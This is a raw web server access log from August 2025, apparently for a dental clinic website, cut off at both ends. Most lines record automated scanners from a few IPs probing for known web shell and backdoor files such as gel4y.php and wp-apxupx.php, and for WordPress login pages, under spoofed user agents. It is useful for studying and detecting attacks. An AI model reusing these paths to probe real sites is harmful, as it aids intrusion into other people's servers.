301 258 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:14:10:21 -0400] "GET /vendor/htmlawed/htmlawed/gel4y.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:14:10:54 -0400] "GET /cgi-bin/inputs.php HTTP/1.1" 301 253 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:14:11:26 -0400] "GET /helpdesk//vendor/htmlawed/htmlawed/gel4y.php HTTP/1.1" 301 278 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 149.50.215.205 - - [12/Aug/2025:14:11:55 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:14:11:55 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:14:11:55 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:14:11:55 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:14:11:59 -0400] "GET /wp-includes/sodium_compat/src/Core/Curve25519/Ge/network.php HTTP/1.1" 301 295 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:14:12:12 -0400] "GET /repeater.php HTTP/1.1" 301 247 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 24.199.103.196 - - [12/Aug/2025:14:12:16 -0400] "GET / HTTP/1.1" 301 231 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0" 24.199.103.196 - - [12/Aug/2025:14:12:16 -0400] "GET /favicon.ico HTTP/1.1" 301 242 "http://orthosquare.in/" "Mozilla/5.0 (X11; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0" 94.16.113.252 - - [12/Aug/2025:14:12:18 -0400] "GET /test.php HTTP/1.1" 301 243 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:14:12:41 -0400] "GET /themes.php HTTP/1.1" 301 245 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:14:13:13 -0400] "GET /wp-includes/css/dist/niil.php HTTP/1.1" 301 264 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:14:13:34 -0400] "GET /index.php?3x=3x HTTP/1.1" 301 250 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:14:14:40 -0400] "GET /wp-admin/network/theme-inshpvx.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:14:14:48 -0400] "GET /theme-inshpvx.php HTTP/1.1" 301 252 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 68.183.245.101 - - [12/Aug/2025:14:17:39 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:14:17:40 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:14:17:40 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:14:17:40 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 152.42.157.60 - - [12/Aug/2025:14:21:32 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.89.216.7 - - [12/Aug/2025:14:21:32 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 174.138.112.39 - - [12/Aug/2025:14:21:32 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 170.64.252.169 - - [12/Aug/2025:14:21:32 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:14:25:25 -0400] "GET /modules//mod_rebug/library/index.php HTTP/1.1" 301 270 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:14:26:05 -0400] "GET /modules//mod_rebug/library/index.php HTTP/1.1" 301 270 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 149.50.215.205 - - [12/Aug/2025:14:27:02 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:14:27:02 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:14:27:02 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:14:27:02 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:14:28:07 -0400] "GET /simple.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:14:29:32 -0400] "GET /simple.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 209.38.125.40 - - [12/Aug/2025:14:33:27 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 144.126.240.247 - - [12/Aug/2025:14:33:27 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.203.144 - - [12/Aug/2025:14:33:27 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.190.67 - - [12/Aug/2025:14:33:28 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 86.8.204.43 - - [12/Aug/2025:14:33:28 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:14:33:28 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:14:33:29 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:14:33:29 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:14:34:26 -0400] "GET /admin.php?520 HTTP/1.1" 301 248 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 173.252.107.3 - - [12/Aug/2025:14:35:08 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 173.252.83.113 - - [12/Aug/2025:14:35:08 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 66.220.149.113 - - [12/Aug/2025:14:35:09 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 173.252.95.16 - - [12/Aug/2025:14:35:11 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 69.171.230.7 - - [12/Aug/2025:14:35:24 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 69.171.230.9 - - [12/Aug/2025:14:35:24 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 31.13.115.113 - - [12/Aug/2025:14:36:28 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 69.171.230.4 - - [12/Aug/2025:14:37:28 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 173.252.79.7 - - [12/Aug/2025:14:37:47 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 31.13.127.22 - - [12/Aug/2025:14:38:14 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 146.190.11.185 - - [12/Aug/2025:14:38:15 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:14:38:16 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 164.90.241.135 - - [12/Aug/2025:14:38:16 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.203.144.167 - - [12/Aug/2025:14:38:16 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 173.252.95.16 - - [12/Aug/2025:14:38:36 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 66.220.149.1 - - [12/Aug/2025:14:38:46 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 173.252.83.116 - - [12/Aug/2025:14:38:48 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 31.13.103.4 - - [12/Aug/2025:14:39:08 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 149.50.215.205 - - [12/Aug/2025:14:42:31 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:14:42:31 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:14:42:31 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:14:42:31 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:14:45:53 -0400] "GET /inputs.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:14:45:57 -0400] "GET /wp-includes/inputs.php HTTP/1.1" 301 257 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 68.183.245.101 - - [12/Aug/2025:14:46:59 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:14:46:59 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:14:46:59 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:14:47:00 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:14:47:06 -0400] "GET /wp-admin/inputs.php HTTP/1.1" 301 254 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:14:48:13 -0400] "GET /wp-content/inputs.php HTTP/1.1" 301 256 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 152.42.157.60 - - [12/Aug/2025:14:50:29 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 174.138.112.39 - - [12/Aug/2025:14:50:29 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.89.216.7 - - [12/Aug/2025:14:50:30 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 170.64.252.169 - - [12/Aug/2025:14:50:30 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 13.76.186.12 - - [12/Aug/2025:14:54:07 -0400] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 301 279 "-" "-" 13.76.186.12 - - [12/Aug/2025:14:54:07 -0400] "GET /wp-content/wp-conflg.php HTTP/1.1" 301 255 "-" "-" 13.76.186.12 - - [12/Aug/2025:14:54:07 -0400] "GET /wp-admin/wp-conflg.php HTTP/1.1" 301 253 "-" "-" 13.76.186.12 - - [12/Aug/2025:14:54:07 -0400] "GET /.trash7309/index.php HTTP/1.1" 301 251 "-" "-" 13.76.186.12 - - [12/Aug/2025:14:54:08 -0400] "GET /wp-admin/file.php HTTP/1.1" 301 248 "-" "-" 13.76.186.12 - - [12/Aug/2025:14:54:08 -0400] "GET /404.php HTTP/1.1" 301 238 "-" "-" 13.76.186.12 - - [12/Aug/2025:14:54:08 -0400] "GET /file9.php HTTP/1.1" 301 240 "-" "-" 94.16.113.252 - - [12/Aug/2025:14:55:38 -0400] "GET /classwithtostring.php HTTP/1.1" 301 256 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 195.47.238.91 - - [12/Aug/2025:14:56:04 -0400] "GET /administrator/ HTTP/1.1" 301 245 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.1043 YaBrowser/24.7.6.1043 (beta) Yowser/2.5 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:14:56:17 -0400] "GET /wp-admin/images/wp-login.php HTTP/1.1" 301 263 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:14:56:29 -0400] "GET /wp-admin/wp-apxupx.php?apx=upx HTTP/1.1" 301 265 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 162.210.173.17 - - [12/Aug/2025:14:56:37 -0400] "GET /wp-login.php HTTP/1.1" 301 243 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.1043 YaBrowser/24.7.6.1043 (beta) Yowser/2.5 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:14:56:56 -0400] "GET /jp.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:14:57:15 -0400] "GET /wp-apxupx.php?apx=upx HTTP/1.1" 301 256 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 209.38.125.40 - - [12/Aug/2025:14:57:21 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.50.215.205 - - [12/Aug/2025:14:57:21 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:14:57:22 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:14:57:22 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:14:57:30 -0400] "GET /wp-content/languages/themes/wp-login.php HTTP/1.1" 301 275 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 185.129.62.63 - - [12/Aug/2025:14:57:46 -0400] "GET /admin HTTP/1.1" 301 236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.1043 YaBrowser/24.7.6.1043 (beta) Yowser/2.5 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:14:58:06 -0400] "GET /wp-content/plugins/wp-apxupx.php?apx=upx HTTP/1.1" 301 275 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:14:58:12 -0400] "GET /wp-includes/fonts/wp-login.php HTTP/1.1" 301 265 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:14:58:53 -0400] "GET /wp-admin/js/about.php7 HTTP/1.1" 301 257 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:14:59:05 -0400] "GET /wp-content/uploads/wp-apxupx.php?apx=upx HTTP/1.1" 301 275 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:14:59:23 -0400] "GET /wp-login.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:14:59:46 -0400] "GET /wp-content/wp-apxupx.php?apx=upx HTTP/1.1" 301 267 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:15:00:04 -0400] "GET /wp-login.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:15:00:41 -0400] "GET /radio.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:15:01:01 -0400] "GET /wp-includes/wp-apxupx.php?apx=upx HTTP/1.1" 301 268 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:15:01:25 -0400] "GET /wp-admin/dropdown.php HTTP/1.1" 301 256 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 68.183.245.101 - - [12/Aug/2025:15:01:41 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:15:01:41 -0400] "GET /send.php 